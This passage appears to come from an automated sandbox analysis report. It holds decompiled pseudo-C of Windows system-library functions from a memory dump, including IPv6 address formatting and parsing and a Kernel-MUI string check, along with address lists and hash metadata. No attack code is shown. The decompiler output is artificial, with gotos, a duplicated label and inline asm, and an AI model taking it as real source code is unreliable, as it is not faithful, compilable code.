						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0091E2A8(_v12,  &_v68, _v16);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0092E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0091E2A8(_t322,  &_v68, _t269);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0093718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00912340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0092E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0091E2A8(_v12,  &_v68, _v16);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0092E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0091E2A8(_t322,  &_v68, _t296);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00938788
                                                0x00938788
                                                0x00938791
                                                0x00938794
                                                0x00938798
                                                0x0093879b
                                                0x0093879e
                                                0x009387a1
                                                0x009387a4
                                                0x009387a7
                                                0x009387aa
                                                0x009387af
                                                0x00981ad3
                                                0x00938b0a
                                                0x00938b0d
                                                0x00938b13
                                                0x00938b19
                                                0x00938b1f
                                                0x00938b25
                                                0x00938b2b
                                                0x00938b31
                                                0x00938b37
                                                0x00938b3d
                                                0x00938b46
                                                0x00938b46
                                                0x009387c6
                                                0x009387d0
                                                0x00981ae0
                                                0x00981ae6
                                                0x00981af8
                                                0x00981af8
                                                0x00981afd
                                                0x00981afe
                                                0x00981b01
                                                0x00981b06
                                                0x00981b06
                                                0x009387d6
                                                0x009387f2
                                                0x009387f7
                                                0x00938807
                                                0x0093880a
                                                0x0093880f
                                                0x00938810
                                                0x00938813
                                                0x00938818
                                                0x00938818
                                                0x0093882c
                                                0x00938831
                                                0x00938838
                                                0x00938908
                                                0x00938920
                                                0x009389f0
                                                0x00938a08
                                                0x00938af6
                                                0x00938af6
                                                0x00938af8
                                                0x00938afb
                                                0x00981beb
                                                0x00981beb
                                                0x00938b04
                                                0x00981bf8
                                                0x00981c0e
                                                0x00981c13
                                                0x00981c16
                                                0x00981c16
                                                0x00981bf8
                                                0x00000000
                                                0x00938b04
                                                0x00938a0e
                                                0x00938a11
                                                0x00938a14
                                                0x00938a15
                                                0x00938a18
                                                0x00938a22
                                                0x00938b59
                                                0x00938a28
                                                0x00938a3c
                                                0x00938a3c
                                                0x00938a42
                                                0x00981bb0
                                                0x00981b11
                                                0x00981b11
                                                0x00000000
                                                0x00938a48
                                                0x00938a51
                                                0x00938a5b
                                                0x00938a5e
                                                0x00938a61
                                                0x00938a69
                                                0x00938a69
                                                0x00938a6d
                                                0x00000000
                                                0x00000000
                                                0x00938a74
                                                0x00938a7c
                                                0x00938a7d
                                                0x00938a91
                                                0x00938a93
                                                0x00938a93
                                                0x00938a98
                                                0x00938a9b
                                                0x00938aa1
                                                0x00938aa1
                                                0x00938aa4
                                                0x00938aaa
                                                0x00938ab1
                                                0x00938ac5
                                                0x00938ac7
                                                0x00938ac7
                                                0x00938ac5
                                                0x00938ace
                                                0x00981bc9
                                                0x00981bce
                                                0x00981bd2
                                                0x00981bd2
                                                0x00938ad8
                                                0x00938aeb
                                                0x00938aeb
                                                0x00938af0
                                                0x00938af4
                                                0x00000000
                                                0x00938af4
                                                0x00938a42
                                                0x00938926
                                                0x00938929
                                                0x0093892c
                                                0x0093892d
                                                0x00938930
                                                0x00938935
                                                0x0093893a
                                                0x00938b51
                                                0x00938940
                                                0x00938954
                                                0x00938954
                                                0x0093895a
                                                0x00981b63
                                                0x00000000
                                                0x00938960
                                                0x00938969
                                                0x00938973
                                                0x00938976
                                                0x00938979
                                                0x0093897e
                                                0x00938981
                                                0x00938981
                                                0x00938986
                                                0x00000000
                                                0x00000000
                                                0x00981b6e
                                                0x00981b74
                                                0x00981b7b
                                                0x00981b8f
                                                0x00981b91
                                                0x00981b91
                                                0x00981b99
                                                0x00981b9c
                                                0x00981ba2
                                                0x00981ba2
                                                0x0093898c
                                                0x00938992
                                                0x00938999
                                                0x009389ad
                                                0x00981ba8
                                                0x00981ba8
                                                0x009389ad
                                                0x009389b6
                                                0x009389c8
                                                0x009389cd
                                                0x009389d0
                                                0x009389d0
                                                0x009389d6
                                                0x009389e8
                                                0x009389e8
                                                0x009389ed
                                                0x00000000
                                                0x009389ed
                                                0x0093895a
                                                0x0093883e
                                                0x00938841
                                                0x00938844
                                                0x00938845
                                                0x00938848
                                                0x0093884d
                                                0x00938852
                                                0x00938b49
                                                0x00938858
                                                0x0093886c
                                                0x0093886c
                                                0x00938872
                                                0x00981b0e
                                                0x00000000
                                                0x00938878
                                                0x00938881
                                                0x0093888b
                                                0x0093888e
                                                0x00938891
                                                0x00938896
                                                0x00938899
                                                0x00938899
                                                0x0093889e
                                                0x00000000
                                                0x00000000
                                                0x00981b21
                                                0x00981b27
                                                0x00981b2e
                                                0x00981b42
                                                0x00981b44
                                                0x00981b44
                                                0x00981b4c
                                                0x00981b4f
                                                0x00981b55
                                                0x00981b55
                                                0x009388a4
                                                0x009388aa
                                                0x009388b1
                                                0x009388c5
                                                0x00981b5b
                                                0x00981b5b
                                                0x009388c5
                                                0x009388ce
                                                0x009388e0
                                                0x009388e5
                                                0x009388e8
                                                0x009388e8
                                                0x009388ee
                                                0x00938900
                                                0x00938900
                                                0x00938905
                                                0x00000000
                                                0x00938905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Number-Allowed, xrefs: 009387E6
                                                • Kernel-MUI-Language-SKU, xrefs: 009389FC
                                                • WindowsExcludedProcs, xrefs: 009387C1
                                                • Kernel-MUI-Language-Allowed, xrefs: 00938827
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00938914
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                • Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
                                                • Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                • Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E009513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x912926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00947707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x919cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00947707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00947707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00947707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00947707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x009513d5
                                                0x009513d9
                                                0x009513dc
                                                0x009513de
                                                0x009513e1
                                                0x009513e8
                                                0x009513ee
                                                0x0097e8fd
                                                0x00000000
                                                0x0097e921
                                                0x0097e921
                                                0x0097e928
                                                0x0097e982
                                                0x0097e98a
                                                0x00000000
                                                0x0097e99a
                                                0x0097e99e
                                                0x0097e9a3
                                                0x0097e9a8
                                                0x0097e9b9
                                                0x0097e978
                                                0x00000000
                                                0x0097e978
                                                0x0097e98a
                                                0x0097e92a
                                                0x0097e931
                                                0x0097e944
                                                0x0097e944
                                                0x0097e950
                                                0x0097e954
                                                0x0097e959
                                                0x0097e95e
                                                0x0097e963
                                                0x0097e970
                                                0x00000000
                                                0x0097e975
                                                0x0097e93b
                                                0x0097e980
                                                0x00000000
                                                0x0097e980
                                                0x0097e942
                                                0x0097e94b
                                                0x00000000
                                                0x0097e94b
                                                0x00000000
                                                0x0097e942
                                                0x009513f4
                                                0x009513f4
                                                0x009513f9
                                                0x009513fc
                                                0x009513ff
                                                0x00951406
                                                0x0097e9cc
                                                0x0097e9d2
                                                0x0097e9d2
                                                0x0097e9cc
                                                0x0095140c
                                                0x00951411
                                                0x00951431
                                                0x0095143a
                                                0x0095143c
                                                0x0095143f
                                                0x0095143f
                                                0x00951442
                                                0x00951447
                                                0x009514a8
                                                0x009514ac
                                                0x0097e9e2
                                                0x0097e9e7
                                                0x0097e9ec
                                                0x0097ea05
                                                0x0097ea05
                                                0x00000000
                                                0x00951449
                                                0x00000000
                                                0x00951449
                                                0x0095144c
                                                0x00951459
                                                0x00951462
                                                0x00951469
                                                0x0095146a
                                                0x00951470
                                                0x00951473
                                                0x00951476
                                                0x00951476
                                                0x00951490
                                                0x00951495
                                                0x0095138e
                                                0x00951390
                                                0x00951397
                                                0x00951398
                                                0x00951399
                                                0x009513a1
                                                0x009513a4
                                                0x009513a4
                                                0x00951498
                                                0x0095149c
                                                0x0095149f
                                                0x009514a2
                                                0x00000000
                                                0x00000000
                                                0x009514a4
                                                0x00000000
                                                0x009514a4
                                                0x00951413
                                                0x00951415
                                                0x00951416
                                                0x00951419
                                                0x0095141c
                                                0x00951422
                                                0x009513b7
                                                0x009513bc
                                                0x009513bf
                                                0x009513bf
                                                0x009513c2
                                                0x00951424
                                                0x00951424
                                                0x00951424
                                                0x00951427
                                                0x0095142b
                                                0x0095142c
                                                0x0095142c
                                                0x0095142c
                                                0x00000000
                                                0x0095141c
                                                0x00951411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                • Instruction ID: 72cd99971ccd6134a5dcfda58467dc29bfd970ad00d573ec60a484d5d7635a30
                                                • Opcode Fuzzy Hash: 94cdbd04d4cbbdfe01840ad0d72238f5854689f7170f7cd68456f9c9dac92a12
                                                • Instruction Fuzzy Hash: 0C615872A00659AACF34CF9AC8909BFBBB9EFD4305B54C42DF9DA47540D334AA44CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00950B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00950B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00928980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L0091DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00950CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00950CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009506BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009506BA(_t135, _t178) == 0 || E00950A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00950CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00950CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009506BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009506BA(_t124, _t142) == 0 || E00950A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x00950b21
                                                0x00950b24
                                                0x00950b27
                                                0x00950b2a
                                                0x00950b2d
                                                0x00950b30
                                                0x00950b33
                                                0x00950b36
                                                0x00950b39
                                                0x00950b3e
                                                0x00950c65
                                                0x00950c68
                                                0x00950c6a
                                                0x00950c6f
                                                0x0097eb42
                                                0x00000000
                                                0x00000000
                                                0x0097eb48
                                                0x0097eb48
                                                0x00950c75
                                                0x00950c7a
                                                0x0097eb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0097eb5a
                                                0x00950c80
                                                0x00950c84
                                                0x0097eb98
                                                0x00000000
                                                0x00000000
                                                0x0097eba6
                                                0x00950cb8
                                                0x00950cba
                                                0x00950cd3
                                                0x00950cda
                                                0x00950ce4
                                                0x00950ce9
                                                0x00000000
                                                0x00950cec
                                                0x00950c8c
                                                0x0097eb63
                                                0x00000000
                                                0x00000000
                                                0x0097eb70
                                                0x0097eb75
                                                0x0097eb7d
                                                0x00000000
                                                0x00000000
                                                0x0097eb8c
                                                0x00000000
                                                0x0097eb8c
                                                0x00950c96
                                                0x00000000
                                                0x00000000
                                                0x00950ca2
                                                0x00950cac
                                                0x00950cb4
                                                0x00000000
                                                0x00000000
                                                0x00950b44
                                                0x00950b47
                                                0x00950b49
                                                0x00000000
                                                0x00000000
                                                0x00950b4f
                                                0x00950b50
                                                0x00000000
                                                0x00000000
                                                0x00950b56
                                                0x00950b62
                                                0x00950b7c
                                                0x00950bac
                                                0x00950a0f
                                                0x0097eaaa
                                                0x00000000
                                                0x0097eac4
                                                0x0097eac4
                                                0x00950bd0
                                                0x00950bd0
                                                0x00950bd4
                                                0x00950bd9
                                                0x00000000
                                                0x00000000
                                                0x00950bdb
                                                0x00950be0
                                                0x0097eb0e
                                                0x00950a1a
                                                0x00000000
                                                0x00950a1a
                                                0x0097eb1a
                                                0x0097eb1f
                                                0x0097eb27
                                                0x00000000
                                                0x00000000
                                                0x0097eb36
                                                0x00000000
                                                0x0097eb36
                                                0x00950bea
                                                0x00000000
                                                0x00000000
                                                0x00950bf6
                                                0x00950c00
                                                0x00950c03
                                                0x00950c0b
                                                0x00000000
                                                0x00950c0b
                                                0x0097eaaa
                                                0x00000000
                                                0x00950a15
                                                0x00950bb6
                                                0x00000000
                                                0x00950bc6
                                                0x00950bc6
                                                0x00950bcb
                                                0x00950c15
                                                0x00000000
                                                0x00000000
                                                0x00950c1d
                                                0x00950c20
                                                0x00950c21
                                                0x00950c24
                                                0x00950c24
                                                0x00950c26
                                                0x00000000
                                                0x00950c26
                                                0x00950bcd
                                                0x00000000
                                                0x00950bcd
                                                0x00950b89
                                                0x00950b89
                                                0x00950b90
                                                0x00000000
                                                0x00000000
                                                0x00950b96
                                                0x00000000
                                                0x00950b96
                                                0x00950a04
                                                0x00950a04
                                                0x00950b9a
                                                0x00950b9a
                                                0x00950b9b
                                                0x00950b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00950ba5
                                                0x00950ac7
                                                0x00950aca
                                                0x0097eacf
                                                0x00000000
                                                0x0097eade
                                                0x0097eade
                                                0x0097eae3
                                                0x00000000
                                                0x00000000
                                                0x0097eaf3
                                                0x0097eaf6
                                                0x0097eaf7
                                                0x0097eafe
                                                0x0097eb01
                                                0x00000000
                                                0x0097eb01
                                                0x0097eacf
                                                0x00950ad0
                                                0x00950ad4
                                                0x00000000
                                                0x00000000
                                                0x00950ada
                                                0x00950ae6
                                                0x00950c34
                                                0x00000000
                                                0x00950c47
                                                0x00950c49
                                                0x00950c4a
                                                0x00950c4e
                                                0x00950c51
                                                0x00950c54
                                                0x00950c57
                                                0x00950c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00950c60
                                                0x00950afb
                                                0x00950afe
                                                0x00950b02
                                                0x00950b05
                                                0x00950b08
                                                0x00000000
                                                0x00950b08
                                                0x00950ae6
                                                0x00950b44
                                                0x009509f8
                                                0x009509f8
                                                0x009509f9
                                                0x00000000
                                                0x00000000
                                                0x0097eaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: c83b3e10928f01a0504d1eaaeace5ad2196d40e8ed0cab7208212e9123c3becd
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 0CA1B271D0030ADFDF24CF6AC8457BEB7B8AF96306F24896ADC82A7241D7345A49CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00950554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 49%
                                                			E00950554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
									_push(_t144);
									_push(0);
									_t51 = E0090F8CC( *((intOrPtr*)(_t96 + 0x18)));
